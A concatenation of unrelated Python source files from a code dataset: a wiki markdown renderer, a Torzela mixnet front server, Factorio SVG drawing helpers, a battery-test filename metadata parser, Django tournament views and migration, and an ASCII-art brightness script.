self.toc_data += '<a href="#s-' + head_level_str_2 + '">' + head_level_str + '</a> ' + head_data + '<br>'
return '<h' + head_len + ' id="s-' + head_level_str_2 + '"><a href="#toc">' + head_level_str + '</a> ' + head_data + '</h' + head_len + '>'
def get_toc(self):
return self.toc_data + '</div>'
class link_render:
def __init__(self, plus_data, include_name):
self.str_e_link_id = 0
self.plus_data = ''
self.include_name = include_name
def __call__(self, match):
str_e_link_id = str(self.str_e_link_id)
self.str_e_link_id += 1
if match[1] == '!':
file_name = ''
if re.search(r'^http(s)?:\/\/', match[3], flags = re.I):
file_src = match[3]
file_alt = match[3]
exist = '1'
else:
file_name = re.search(r'^([^.]+)\.([^.]+)$', match[3])
if file_name:
file_end = file_name.group(2)
file_name = file_name.group(1)
else:
file_name = 'Test'
file_end = 'jpg'
file_src = '/image/' + tool.sha224_replace(file_name) + '.' + file_end
file_alt = 'file:' + file_name + '.' + file_end
exist = None
return '' + \
'<span class="' + self.include_name + 'file_finder" ' + \
'under_alt="' + file_alt + '" ' + \
'under_src="' + file_src + '" ' + \
'under_style="" ' + \
'under_href="' + ("out_link" if exist else '/upload?name=' + tool.url_pas(file_name)) + '">' + \
'</span>' + \
''
else:
if re.search(r'^http(s)?:\/\/', match[3], flags = re.I):
self.plus_data += '' + \
'document.getElementsByName("' + self.include_name + 'set_link_' + str_e_link_id + '")[0].href = ' + \
'"' + match[3] + '";' + \
'\n' + \
''
return '<a id="out_link" ' + \
'href="" ' + \
'name="' + self.include_name + 'set_link_' + str_e_link_id + '">' + match[2] + '</a>'
else:
self.plus_data += '' + \
'document.getElementsByName("' + self.include_name + 'set_link_' + str_e_link_id + '")[0].href = ' + \
'"/w/' + tool.url_pas(match[3]) + '";' + \
'\n' + \
''
self.plus_data += '' + \
'document.getElementsByName("' + self.include_name + 'set_link_' + str_e_link_id + '")[0].title = ' + \
'"' + match[3] + '";' + \
'\n' + \
''
return '<a class="' + self.include_name + 'link_finder" ' + \
'title="" ' + \
'href="" ' + \
'name="' + self.include_name + 'set_link_' + str_e_link_id + '">' + match[2] + '</a>'
def get_plus_data(self):
return self.plus_data
def markdown(conn, data, title, include_name):
backlink = []
include_name = include_name + '_' if include_name else ''
plus_data = '' + \
'get_link_state("' + include_name + '");\n' + \
'get_file_state("' + include_name + '");\n' + \
''
data = html.escape(data)
data = data.replace('\r\n', '\n')
data = '\n' + data
head_r = r'\n(#{1,6}) ?([^\n]+)'
head_do = head_render()
data = re.sub(head_r, head_do, data)
data = head_do.get_toc() + data
link_r = r'(!)?\[((?:(?!\]\().)+)\]\(([^\]]+)\)'
link_do = link_render(plus_data, include_name)
data = re.sub(link_r, link_do, data)
plus_data = link_do.get_plus_data() + plus_data
data = re.sub(r'\*\*(?P<A>(?:(?!\*\*).)+)\*\*', '<b>\g<A></b>', data)
data = re.sub(r'__(?P<A>(?:(?!__).)+)__', '<i>\g<A></i>', data)
data = re.sub('^\n', '', data)
data = data.replace('\n', '<br>')
data = re.sub(r'(?P<A><\/h[0-6]>)<br>', '\g<A>', data)
return [data, plus_data, backlink]
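# -----------------------------------------------------------------------------
# Hedged usage sketch (not part of the original module). Because of the
# relative `tool` import this file cannot be run directly; the call below only
# illustrates the expected call shape, with a made-up page title and no DB
# connection (the renderer never touches `conn`).
if __name__ == "__main__":
    sample = "# Title\nSee [docs](https://example.com) and **bold** text."
    html_out, js_out, backlink = markdown(None, sample, "Example", "")
    print(html_out)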
|
StarcoderdataPython
|
4838992
|
<gh_stars>1-10
#!/usr/bin/env python3
import socket
import threading
import asyncio
import time
from message import Message
import TorzelaUtils as TU
# Initialize a class specifically for the round info.
# This class will track if a round is currently ongoing or not, the
# actual identifying number of the round, the time it ended, and the lock
# (so that no other messages are sent during the time of the round)
class RoundInfo:
def __init__(self, newRound, endTime):
self.open = True
self.round = newRound
self.endTime = endTime
class FrontServer:
# Set the IP and Port of the next server. Also set the listening port
# for incoming connections. The next server in the chain can
# be a Middle Server or even a Spreading Server
def __init__(self, nextServerIP, nextServerPort, localPort):
self.nextServerIP = nextServerIP
self.nextServerPort = nextServerPort
self.localPort = localPort
# Initialize round variables. This will allow us to track what
# current round the server is on, in addition to the state that the
# previous rounds are in
self.roundID = 1
self.rounds = {}
self.lock = asyncio.Lock()
self.roundDuration = 2
self.currentRound = ""
        # This will allow us to associate a client with its public key
# So that we can figure out which client should get which packet
# Entries are in the form
# ((<IP>,<Port>), <Public Key>) (i.e. (('localhost', 80), "mykey") )
# where <IP> is the client's IP address, <Port> is the client's
# listening port, and <Public Key> is the client's public key
self.clientList = []
        # These arrays hold per-message information for the current round. The
        # i-th entry of each array is, respectively, the local key, the
        # message, and the client public key of the i-th message that arrived
        # in the current round.
self.clientLocalKeys = []
self.clientMessages = []
self.clientPublicKeys = []
# The server keys
self.__privateKey, self.publicKey = TU.generateKeys(
TU.createKeyGenerator() )
# We need to spawn off a thread here, else we will block
# the entire program
threading.Thread(target=self.setupConnection, args=()).start()
# Setup main listening socket to accept incoming connections
threading.Thread(target=self.listen, args=()).start()
# Create a new thread to handle the round timings
threading.Thread(target=self.manageRounds, args=()).start()
def getPublicKey(self):
return self.publicKey
def setupConnection(self):
# Before we can connect to the next server, we need
# to send a setup message to the next server
setupMsg = Message()
setupMsg.setType(0)
setupMsg.setPayload("{}".format(self.localPort))
self.connectionMade = False
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
while not self.connectionMade:
try:
sock.connect((self.nextServerIP, self.nextServerPort))
sock.sendall(str.encode(str(setupMsg)))
self.connectionMade = True
except:
# Put a delay here so we don't burn CPU time
time.sleep(1)
sock.close()
print("FrontServer successfully connected!")
# This is where all messages are handled
def listen(self):
# Wait until we have connected to the next server
while not self.connectionMade:
time.sleep(1)
# Listen for incoming connections
self.listenSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.listenSock.bind(('localhost', self.localPort))
self.listenSock.listen(10) # buffer 10 connections
while True:
print("FrontServer awaiting connection")
conn, client_addr = self.listenSock.accept()
print("FrontServer accepted connection from " + str(client_addr))
# Spawn a thread to handle the client
threading.Thread(target=self.handleMsg, args=(conn, client_addr,)).start()
# This runs in a thread and handles messages from clients
def handleMsg(self, conn, client_addr):
# Receive data from client
clientData = conn.recv(32768).decode("utf-8")
# Format as message
clientMsg = Message()
clientMsg.loadFromString(clientData)
clientIP = client_addr[0]
if clientMsg.getNetInfo() != 1 and clientMsg.getNetInfo() != 2:
print("FrontServer got " + clientData)
# Check if the packet is for setting up a connection
if clientMsg.getNetInfo() == 0:
# Add client's public key to our list of clients
clientPort, clientPublicKey = clientMsg.getPayload().split("|")
# Build the entry for the client. See clientList above
# Store the public key as a string
clientEntry = ((clientIP, clientPort), clientPublicKey)
if clientEntry not in self.clientList:
self.clientList.append(clientEntry)
conn.close()
elif clientMsg.getNetInfo() == 1:
print("Front Server received message from client")
            # Process packets coming from a client and headed towards
            # a dead drop only if the current round is active and the client
            # hasn't already sent a message
clientPublicKey, payload = clientMsg.getPayload().split("#", 1)
if self.currentRound.open and clientPublicKey not in self.clientPublicKeys:
# Decrypt one layer of the onion message
clientLocalKey, newPayload = TU.decryptOnionLayer(
self.__privateKey, payload, serverType=0)
clientMsg.setPayload(newPayload)
# Save the message data
                # TODO (jose) -> use the lock here. Multiple threads could try to
                # access this info at the same time. In fact, we should process
                # messages with netinfo == 1 ONE AT A TIME or we could create inconsistencies.
self.clientPublicKeys.append(clientPublicKey)
self.clientLocalKeys.append(clientLocalKey)
self.clientMessages.append(clientMsg)
elif clientMsg.getNetInfo() == 2:
print("FrontServer received message from Middle server")
# TODO -> add a lock here, same as with netinfo == 1
# Encrypt one layer of the onion message
clientLocalKey = self.clientLocalKeys[ len(self.clientMessages) ]
newPayload = TU.encryptOnionLayer(self.__privateKey,
clientLocalKey,
clientMsg.getPayload())
clientMsg.setPayload(newPayload)
self.clientMessages.append(clientMsg)
elif clientMsg.getNetInfo() == 3:
# Dialing Protocol: Client -> DeadDrop
_, newPayload = TU.decryptOnionLayer(
self.__privateKey, clientMsg.getPayload(), serverType=0)
clientMsg.setPayload(newPayload)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.nextServerIP, self.nextServerPort))
sock.sendall(str(clientMsg).encode("utf-8"))
sock.close()
# A thread running this method will be in charge of the different rounds
def manageRounds(self):
while True:
time.sleep(10)
# Reset the saved info about the messages for the round before it starts
self.clientLocalKeys = []
            # Clear the per-round public key list so clients can send again next round
            self.clientPublicKeys = []
self.clientMessages = []
# Create the new round using our class above
            self.currentRound = RoundInfo(self.roundID, self.roundDuration)
self.rounds[self.roundID] = self.currentRound
print("Front Server starts round: ", self.roundID)
# Tell all the clients that a new round just started
firstMsg = Message()
firstMsg.setNetInfo(5)
for clientIpAndPort, clientPK in self.clientList:
tempSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tempSock.connect((clientIpAndPort[0], int(clientIpAndPort[1])))
tempSock.sendall(str.encode(str(firstMsg)))
tempSock.close()
# Start timer
startTime = time.process_time()
# Allow clients to send messages for duration of round
# Clients can only send message while self.currentRound.open == True
while time.process_time() - startTime < self.roundDuration:
continue
# Now that round has ended, mark current round as closed
self.currentRound.open = False
            # TODO -> Once the noise addition is added, the rounds should ALWAYS
            # run, even if there are no messages
if len(self.clientMessages) > 0:
# Now that all the messages are stored in self.clientMessages,
# run the round
self.runRound()
print("Front Server finished round: ", self.roundID)
self.roundID += 1
    # Runs a server round. Assuming that the messages are stored in
    # self.clientMessages, adds noise, shuffles them, and forwards them to
    # the next server
def runRound(self):
# TODO (jose): Noise addition goes here
# Apply the mixnet by shuffling the messages
nMessages = len(self.clientMessages)
permutation = TU.generatePermutation(nMessages)
shuffledMessages = TU.shuffleWithPermutation(self.clientMessages,
permutation)
# Also shuffle the messages so they still match the clientMessages:
# self.clientLocalKeys[ i ] is the key that unlocks message self.clientMessges[ i ]
# This is used afterwards in handleMessage, getNetInfo() == 2
self.clientLocalKeys = TU.shuffleWithPermutation(self.clientLocalKeys,
permutation)
# Forward all the messages to the next server
        # Send a message to the next server announcing the number of
        # messages that will be sent
firstMsg = Message()
firstMsg.setNetInfo(4)
firstMsg.setPayload("{}".format(nMessages))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.nextServerIP, self.nextServerPort))
sock.sendall(str(firstMsg).encode("utf-8"))
sock.close()
# Send all the messages to the next server
for msg in shuffledMessages:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.nextServerIP, self.nextServerPort))
sock.sendall(str(msg).encode("utf-8"))
sock.close()
# Restart the messages so that we receive the responses from the
# next server
self.clientMessages = []
# Wait until we have received all the responses. These responses are
# handled in the main thread using the method handleMsg with
# msg.getNetInfo == 2
print("Front Server waiting for responses from Middle Server")
while len(self.clientMessages) < nMessages:
continue
# Unshuffle the messages
self.clientMessages = TU.unshuffleWithPermutation(self.clientMessages,
permutation)
# Send each response back to the correct client
for clientPK, msg in zip(self.clientPublicKeys, self.clientMessages):
# Find the client ip and port using the clients keys
matches = [ (ip, port) for ((ip, port), pk) in self.clientList
if clientPK == pk]
if len(matches) == 0:
print("Front server error: couldn't find client where to send the response")
continue
elif len(matches) > 1:
print("Front server error: too many clients where to send the response")
continue
clientIP, clientPort = matches[0]
clientPort = int(clientPort)
tempSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tempSock.connect((clientIP, clientPort))
tempSock.sendall(str(msg).encode("utf-8"))
tempSock.close()
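# -----------------------------------------------------------------------------
# Hedged usage sketch (not part of the original file): the host/port values
# below are placeholders, since the real Torzela topology is configured
# elsewhere. Constructing the server is enough to start its listener, round
# manager and connection threads.
if __name__ == "__main__":
    front = FrontServer("localhost", 8001, 8000)
    print("Front server public key:", front.getPublicKey())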
|
StarcoderdataPython
|
1791918
|
<filename>factorioBlueprintVisualizer/draw.py
import numpy as np
def get_drawing(bbox_width, bbox_height, svg_width_in_mm=250, background_color="#dddddd", metadata_str=None):
dwg = [f'<svg baseProfile="tiny" height="{svg_width_in_mm*bbox_height/bbox_width}mm" version="1.2" viewBox="0,0,{bbox_width},{bbox_height}" width="{svg_width_in_mm}mm" xmlns="http://www.w3.org/2000/svg" xmlns:ev="http://www.w3.org/2001/xml-events" xmlns:xlink="http://www.w3.org/1999/xlink">']
if metadata_str is not None:
dwg.append(metadata_str)
if background_color is not None:
dwg.append(f'<rect fill="{background_color}" height="10000" width="10000" x="-100" y="-100" />')
return dwg
def draw_lines(dwg, lines, svg_setting):
dwg.append('<path')
append_svg_setting(dwg, svg_setting)
dwg.append(' d="')
for p1, p2 in lines:
dwg.append('M{} {} {} {}'.format(*p1, *p2))
dwg.append('"/>')
def append_svg_setting(dwg, svg_setting, deny_list=[]):
for key, value in svg_setting.items():
if key not in deny_list:
dwg.append(f' {key}="{value}"')
def append_group(dwg, svg_setting, deny_list=[]):
dwg.append('<g')
append_svg_setting(dwg, svg_setting, deny_list)
dwg.append('>')
def draw_rect(dwg, mid, size, scale, rx, ry):
if scale is not None:
size = (size[0] * scale, size[1] * scale)
dwg.append(f'<rect height="{size[1]}" width="{size[0]}" x="{mid[0]-size[0]/2}" y="{mid[1]-size[1]/2}"')
if rx is not None:
dwg.append(f' rx="{rx}" ')
if ry is not None:
dwg.append(f' ry="{ry}" ')
dwg.append('/>')
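# -----------------------------------------------------------------------------
# Minimal illustrative example (an assumption, since this module defines no
# writer itself): callers are expected to close and join the fragment list to
# obtain the final SVG text.
if __name__ == "__main__":
    dwg = get_drawing(bbox_width=10, bbox_height=10)
    draw_rect(dwg, mid=(5, 5), size=(2, 3), scale=None, rx=None, ry=None)
    draw_lines(dwg, [((1, 1), (9, 9))], {"stroke": "#000000", "stroke-width": 0.1})
    dwg.append('</svg>')  # closing tag added by hand in this sketch
    print("".join(dwg))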
|
StarcoderdataPython
|
1668884
|
from filename_database.models import ExperimentType, ChargerDriveProfile, Category, SubCategory, ValidMetadata
import re
import datetime
import itertools
def guess_exp_type(file, root):
"""
This function takes a file as input and guesses what experiment type it is.
:param file:
:param root:
:return: the experiment type
"""
lowercase_file = file.lower()
fileList = re.split(r'-|_|\.|\s', lowercase_file)
    # We handle cycling, formation and fra; maccor is the only exception
cat_match = {
'cycling': r'(^cyc$)|(^cycling$)',
'formation': r'(^form$)|(^fm$)',
'impedance': r'^fra$',
'rpt': r'^rpt$',
}
cat = None
broken = False
for k in cat_match.keys():
if broken:
break
for elem in fileList:
if re.match(cat_match[k], elem):
cat = Category.objects.get(name=k)
broken = True
break
if cat is not None:
# try to match subcategory
sub_match = {
'neware':r'(^neware$)|(^nw$)',
'moli':r'^mo$',
'uhpc':r'^uhpc$',
'novonix':r'(^novonix$)|(^nx$)',
}
sub = None
broken = False
for k in sub_match.keys():
if broken:
break
for elem in fileList[1:]:
if re.match(sub_match[k], elem):
sub = SubCategory.objects.get(name=k)
broken = True
break
if sub is None:
if 'NEWARE' in root:
sub = SubCategory.objects.get(name='neware')
else:
sub = SubCategory.objects.get(name='maccor')
exp_type = ExperimentType.objects.get(category=cat, subcategory=sub)
#TODO: make a table in the experiment type to be the valid regexp for file extension.
if sub.name=='neware':
if lowercase_file.split('.')[-1] != 'txt':
return None
return exp_type
#handle the rest
match = [
('gas', 'insitu', r'(^insitugas$)|(^insitu$)|(^gasinsitu$)'),
('impedance', 'eis', r'^eis$'),
('impedance', 'symmetric', r'(^sym$)|(^symmetric$)'),
('thermal', 'arc', r'^arc$'),
('thermal', 'microcalorimetry', r'^tam$'),
('storage', 'smart', r'smart'),
('storage', 'dumb', r'dumb'),
('electrolyte', 'gcms', r'^gcms$'),
('electrolyte', 'ldta', r'^ldta$'),
('electrode', 'xps', r'^xps$'),
]
for c, s, p in match:
for elem in fileList:
if re.search(p, elem):
cat = Category.objects.get(name=c)
sub = SubCategory.objects.get(name=s)
if cat.name == 'impedance' and sub.name == 'eis':
if 'MACCOR' in root:
sub = SubCategory.objects.get(name='maccor')
exp_type = ExperimentType.objects.get(category=cat, subcategory=sub)
return exp_type
return None
##============================================================================================##
# META-DATA EXTRACTOR FUNCTION #
##============================================================================================##
def get_date_obj(date_str):
"""
parse date string
:param date_str:
:return:
"""
mat1 = re.match(r'20(\d{2,2})(\d{2,2})(\d{2,2})', date_str)
mat2 = re.match(r'(\d{2,2})(\d{2,2})(\d{2,2})', date_str)
if mat1:
mat = mat1
elif mat2:
mat = mat2
else:
return None
year = 2000 + int(mat.group(1))
month = int(mat.group(2))
day = int(mat.group(3))
try :
return datetime.date(year,month,day)
except ValueError:
return None
# Function Definition
# Takes in name of file and experiment type as arguments
def deterministic_parser(filename, exp_type):
"""
given a filename and an experiment type,
parse as much metadata as possible
and return a valid_metadata object (None means no parsing, valid metadata with gaps in in means partial parsing.)
:param filename:
:param exp_type:
:return:
"""
lowercase_file = filename.lower()
fileList = re.split(r'-|_|\.|\s', lowercase_file)
def get_charID(fileList):
max_look = min(3, len(fileList)-1)
for elem in fileList[:max_look]:
if re.match(r'^[a-z]{2,5}$', elem) and not (
re.search(
r'(cyc)|(gcms)|(rpt)|(eis)|(fra)|(sym)|(arc)|(tam)|(xps)|(fm)|(mo)|(nw)|(nx)',
elem)):
return elem
return None
def get_possible_cell_ids(fileList):
possible_cell_ids = []
max_look = min(5, len(fileList) - 1)
for elem in fileList[:max_look]:
if (not re.match(r'200[8-9]0[1-9][0-3][0-9]$|'
r'200[8-9]1[0-2][0-3][0-9]$|'
r'20[1-2][0-9]0[1-9][0-2][0-9]$|'
r'20[1-2][0-9]1[0-1][0-2][0-9]$|'
r'20[1-2][0-9]0[1-9][0-3][0-1]$|'
r'20[1-2][0-9]1[0-1][0-3][0-1]$|'
r'0[8-9]0[1-9][0-3][0-9]$|'
r'0[8-9]1[0-2][0-3][0-9]$|'
r'[1-2][0-9]0[1-9][0-2][0-9]$|'
r'[1-2][0-9]1[0-2][0-2][0-9]$|'
r'[1-2][0-9]0[1-9][0-3][0-1]$|'
r'[1-2][0-9]1[0-2][0-3][0-1]$',
elem)) and (re.match(r'^(\d{5,6})$|^(0\d{5,5})$', elem)) and elem.isdigit():
possible_cell_ids.append( int(elem))
return possible_cell_ids
def get_start_cycle(fileList, avoid=None):
max_look = min(7, len(fileList) - 1)
for elem in fileList[: max_look]:
match = re.match(r'^c(\d{1,4})$', elem)
if match:
if avoid is not None and avoid == int(match.group(1)):
avoid = None
continue
return int(match.group(1))
return None
def get_temperature(fileList):
for elem in fileList:
match = re.match(r'^(\d{2})c$', elem)
if match:
return int(match.group(1))
return None
def get_voltage(fileList):
for elem in fileList:
match = re.match(r'^(\d{1,3})v$', elem)
if match:
str_voltage = match.group(1)
n = len(str_voltage)
divider = 10.**(float(n)-1)
return float(str_voltage)/divider
return None
def get_possible_dates(fileList):
possible_dates = []
for elem in fileList:
if re.match(r'^[0-9]{6,8}$', elem):
date = get_date_obj(elem)
if date is not None:
possible_dates.append(date)
return possible_dates
def get_version_number(fileList):
for field in fileList:
match = re.match(r'v(\d)', field)
if match:
return int(match.group(1))
def get_ac_increment(fileList):
for i in range(len(fileList) - 1):
match1 = re.match(r'^sym$', fileList[i])
matchA = re.match(r'^a(\d{1,3})$', fileList[i + 1])
matchC = re.match(r'^c(\d{1,3})$', fileList[i + 1])
if match1 and matchA:
return ValidMetadata.ANODE, int(matchA.group(1))
elif match1 and matchC:
return ValidMetadata.CATHODE, int(matchC.group(1))
return None, None
def get_ac(fileList):
for i in range(len(fileList) - 1):
match1 = re.match(r'^xps$', fileList[i])
matchA = re.match(r'^a$', fileList[i + 1])
matchC = re.match(r'^c$', fileList[i + 1])
if match1 and matchA:
return ValidMetadata.ANODE
elif match1 and matchC:
return ValidMetadata.CATHODE
return None
drive_profile_match_dict = {
'cxcy': (r'^c(\d{1,2})c(\d{1,2})$', ChargerDriveProfile.objects.get(drive_profile='CXCY'), True, True),
'xcyc': (r'^(\d{1,2})c(\d{1,2})c$', ChargerDriveProfile.objects.get(drive_profile='CXCY'), False, False),
'xccy': (r'^(\d{1,2})cc(\d{1,2})$', ChargerDriveProfile.objects.get(drive_profile='CXCY'), False, True),
'cxcyc': (r'^c(\d{1,2})c(\d{1,2})c$', ChargerDriveProfile.objects.get(drive_profile='CXCYc'), True, True),
'xcycc': (r'^(\d{1,2})c(\d{1,2})cc$', ChargerDriveProfile.objects.get(drive_profile='CXCYc'), False, False),
'xccyc': (r'^(\d{1,2})cc(\d{1,2})c$', ChargerDriveProfile.objects.get(drive_profile='CXCYc'), False, True),
'cxrc': (r'^c(\d{1,2})rc$', ChargerDriveProfile.objects.get(drive_profile='CXrc'), True),
'xcrc': (r'^(\d{1,2})crc$', ChargerDriveProfile.objects.get(drive_profile='CXrc'), False),
'cxcyb': (r'^c(\d{1,2})c(\d{1,2})b$', ChargerDriveProfile.objects.get(drive_profile='CXCYb'), True, True),
'xcycb': (r'^(\d{1,2})c(\d{1,2})cb$', ChargerDriveProfile.objects.get(drive_profile='CXCYb'), False, False),
'xccyb': (r'^(\d{1,2})cc(\d{1,2})b$', ChargerDriveProfile.objects.get(drive_profile='CXCYb'), False, True),
'cxsz': (r'^c(\d{1,2})s(\d{2,3})$', ChargerDriveProfile.objects.get(drive_profile='CXsZZZ'), True),
'xcsz': (r'^(\d{1,2})cs(\d{2,3})$', ChargerDriveProfile.objects.get(drive_profile='CXsZZZ'), False),
'cx': (r'^c(\d{1,2})$', ChargerDriveProfile.objects.get(drive_profile='CX'), True),
'xc': (r'^(\d{1,2})c$', ChargerDriveProfile.objects.get(drive_profile='CX'), False),
}
def get_possible_drive_profiles(fileList):
possible_drive_profiles = []
if len(fileList) < 4:
return possible_drive_profiles
for elem in fileList[3:]:
if re.match(r'(^0c$)|(^20c$)|(^40c$)|(^55c$)|(^c0$)|(^c1$)', elem):
continue
for k in drive_profile_match_dict.keys():
m = re.match(drive_profile_match_dict[k][0], elem)
if m:
#special cases
my_dp = {'drive_profile': drive_profile_match_dict[k][1]}
if drive_profile_match_dict[k][2]:
my_dp['drive_profile_x_numerator'] = 1
my_dp['drive_profile_x_denominator'] = int(m.group(1))
else:
my_dp['drive_profile_x_numerator'] = int(m.group(1))
my_dp['drive_profile_x_denominator'] = 1
if ((drive_profile_match_dict[k][1].drive_profile=='CXCY') and
(drive_profile_match_dict[k][2] == drive_profile_match_dict[k][3]) and
(m.group(1) == m.group(2))):
# CXCX
my_dp['drive_profile'] = ChargerDriveProfile.objects.get(drive_profile='CXCX')
elif drive_profile_match_dict[k][1].drive_profile=='CXsZZZ':
# CXsZZZ
n = len(m.group(2))
my_dp['drive_profile_z'] = float(m.group(2))/(10.**(float(n)-1))
else:
if len(drive_profile_match_dict[k]) == 4:
if drive_profile_match_dict[k][3]:
my_dp['drive_profile_y_numerator'] = 1
my_dp['drive_profile_y_denominator'] = int(m.group(1))
else:
my_dp['drive_profile_y_numerator'] = int(m.group(1))
my_dp['drive_profile_y_denominator'] = 1
possible_drive_profiles.append(my_dp)
break
return possible_drive_profiles
# TODO: once you have a date, you must prevent cell_id from being that date.
# TODO: for now, if multiple alternatives show up, take first one and print.
metadata = ValidMetadata(experiment_type=exp_type)
valid = True
charID = get_charID(fileList)
if charID is None:
valid = False
else:
metadata.charID = charID
dates = get_possible_dates(fileList)
if len(dates) == 0:
valid = False
elif len(dates) > 1:
metadata.date = dates[0]
else:
metadata.date = dates[0]
if exp_type.cell_id_active:
cell_ids = get_possible_cell_ids(fileList)
if len(cell_ids) == 0:
valid = False
else:
if metadata.date is None:
if len(cell_ids) > 1:
valid = False
else:
metadata.cell_id = cell_ids[0]
else:
valid_cell_ids = []
for cell_id in cell_ids:
date_pieces = [metadata.date.year % 100, metadata.date.month, metadata.date.day]
all_perms = list(itertools.permutations(date_pieces))
cell_id_ok = True
for p in all_perms:
if cell_id == p[0] + p[1]*100 + p[2]*10000:
cell_id_ok = False
break
if cell_id_ok:
valid_cell_ids.append(cell_id)
if len(valid_cell_ids) > 1 or len(valid_cell_ids) == 0:
valid = False
else:
metadata.cell_id = valid_cell_ids[0]
if exp_type.AC_active and exp_type.AC_increment_active:
ac, increment = get_ac_increment(fileList)
if ac is None:
valid = False
else:
metadata.AC = ac
metadata.AC_increment = increment
if exp_type.AC_active and not exp_type.AC_increment_active:
ac = get_ac(fileList)
if ac is None:
valid = False
else:
metadata.AC = ac
if exp_type.start_cycle_active:
avoid = None
if metadata.AC is not None and metadata.AC == ValidMetadata.CATHODE and metadata.AC_increment is not None:
avoid = metadata.AC_increment
start_cycle = get_start_cycle(fileList, avoid)
if start_cycle is None:
valid = False
else:
metadata.start_cycle = start_cycle
if exp_type.voltage_active:
voltage = get_voltage(fileList)
if voltage is None:
valid = False
else:
metadata.voltage = voltage
if exp_type.temperature_active:
temperature = get_temperature(fileList)
if temperature is None:
valid = False
else:
metadata.temperature = temperature
if exp_type.drive_profile_active:
drive_profiles = get_possible_drive_profiles(fileList)
if not len(drive_profiles) == 0:
if not exp_type.start_cycle_active or metadata.start_cycle is None:
dp = drive_profiles[0]
for key in dp.keys():
setattr(metadata, key, dp[key])
else:
for dp in drive_profiles:
                    if dp['drive_profile'].drive_profile == 'CX' and dp['drive_profile_x_denominator'] == metadata.start_cycle:
continue
dp = drive_profiles[0]
for key in dp.keys():
setattr(metadata, key, dp[key])
break
if exp_type.version_number_active:
version_number = get_version_number(fileList)
if version_number is None:
valid = False
else:
metadata.version_number = version_number
print("\t\tEXTRACTED METADATA: {}".format(metadata))
return metadata, valid
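# -----------------------------------------------------------------------------
# Hedged illustration only (importing this module at all requires a configured
# Django environment): the sample filename is made up, but it shows the shared
# tokenization step both parsers above rely on.
if __name__ == "__main__":
    sample_name = "AB_123456_CYC_NW_C1_40C_20200115.txt"
    print(re.split(r'-|_|\.|\s', sample_name.lower()))
    print(get_date_obj("20200115"))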
|
StarcoderdataPython
|
1670427
|
<gh_stars>1-10
from django.shortcuts import render, get_object_or_404, redirect
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.contrib import messages
from django.utils import timezone
from collections import defaultdict
from tournament.models import Tournament, Participant, Game, TournamentRound,\
Season, TournamentType
from player.models import Player
from pairing.utils import Pairing
#from tournament.forms import PlayerForm
@login_required
def tournament_list(request):
tourneys = Tournament.objects.filter(active=True).exclude(
kind__pairing_type=TournamentType.AUTO)
return render(
request,
'tournament/list.html',
{'tourneys': tourneys, 'tourney_types': TournamentType.objects.all()})
@login_required
def register(request, id):
tourney = get_object_or_404(Tournament, pk=id)
if request.method == 'POST':
player = Player.objects.get(user=request.user)
Participant.objects.get_or_create(player=player, tournament=tourney)
parts = [i.player for i in Participant.objects.filter(tournament=tourney)]
return render(
request,
'tournament/register.html',
{
'tourney': tourney,
'participants': parts,
}
)
def join(request, tournament_id, player_id):
tourney = get_object_or_404(Tournament, pk=tournament_id)
player = get_object_or_404(Player, pk=player_id)
Participant.objects.get_or_create(player=player, tournament=tourney)
# Give bye for every missed round
for tourney_round in TournamentRound.objects.filter(
tournament=tourney, paired=True):
Game.objects.create(
tourney_round=tourney_round,
white=player,
black=None,
white_score=settings.BYE_SCORE,
comment='Bye',
synced=True)
return redirect('tournament_register', id=tournament_id)
def pairings(request, id):
tourney = get_object_or_404(Tournament, pk=id)
tourney_round = tourney.current_round
games = Game.objects.filter(tourney_round=tourney_round)
return render(
request,
'tournament/pairings.html',
{
'tourney': tourney,
'current_round': tourney_round,
'games': games
})
def run_pairings(request, id):
tourney_round = get_object_or_404(TournamentRound, pk=id)
tourney = tourney_round.tournament
history = [(i.white.id, i.black.id) for i in Game.objects.filter(
tourney_round__tournament=tourney)]
participants = [
{'id': i.player.id, 'score': i.score}
for i in Participant.objects.filter(tournament=tourney)]
pair = Pairing(participants, history=history)
for left, right in pair.output:
white = Player.objects.get(pk=left)
black = Player.objects.get(pk=right)
Game.objects.create(
tourney_round=tourney_round,
white=white,
black=black)
if pair.remainder:
#import pdb;pdb.set_trace()
white = Player.objects.get(pk=pair.remainder[0]['id'])
Game.objects.create(
tourney_round=tourney_round,
white=white,
black=None,
white_score=settings.BYE_SCORE,
comment='Bye',
synced=True)
tourney_round.paired = True
tourney_round.save()
messages.success(request, 'Pairings completed')
return redirect('tournament_pairings', id=tourney.id)
def leaderboard(request, id):
tourney_type = get_object_or_404(TournamentType, pk=id)
now = timezone.now().date()
season = Season.objects.filter(start_date__lte=now, end_date__gte=now)
_participants = Participant.objects.filter(
tournament__kind=tourney_type, tournament__season=season)
participants = sorted(_participants, key=lambda x: x.score, reverse=True)
d = defaultdict(list)
for participant in participants:
if participant.player.handle:
if len(d[participant.player.handle]) == 10:
continue
else:
d[participant.player.handle].append(participant.score)
out = [{'name': key, 'score': sum(val)} for key, val in d.items()]
#out = [{'name': key, 'score': val} for key, val in d.items()]
out.sort(key=lambda x: x['score'], reverse=True)
return render(
request,
'tournament/leaderboard.html',
{'players': out, 'kind': tourney_type})
|
StarcoderdataPython
|
97797
|
# Generated by Django 3.1.3 on 2020-12-07 21:09
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('dualtext_api', '0007_auto_20201207_2106'),
]
operations = [
migrations.AddField(
model_name='label',
name='color',
field=models.JSONField(null=True),
),
migrations.AddField(
model_name='label',
name='key_code',
field=models.CharField(max_length=1, null=True),
),
]
|
StarcoderdataPython
|
1756357
|
def f(R,G,B):
return 2126*R+7152*G+722*B
def g(a):
    if 0 <= a < 510000:
        return "#"
    elif 510000 <= a < 1020000:
        return "o"
    elif 1020000 <= a < 1530000:
        return "+"
    elif 1530000 <= a < 2040000:
        return "-"
    elif a >= 2040000:
        return "."
N,M=list(map(int,input().split()))
L=[]
for i in range(N):
L.append(list(map(int,input().split())))
for i in range(N):
for j in range(0,3*M,3):
print(g(f(L[i][j],L[i][j+1],L[i][j+2])),end="")
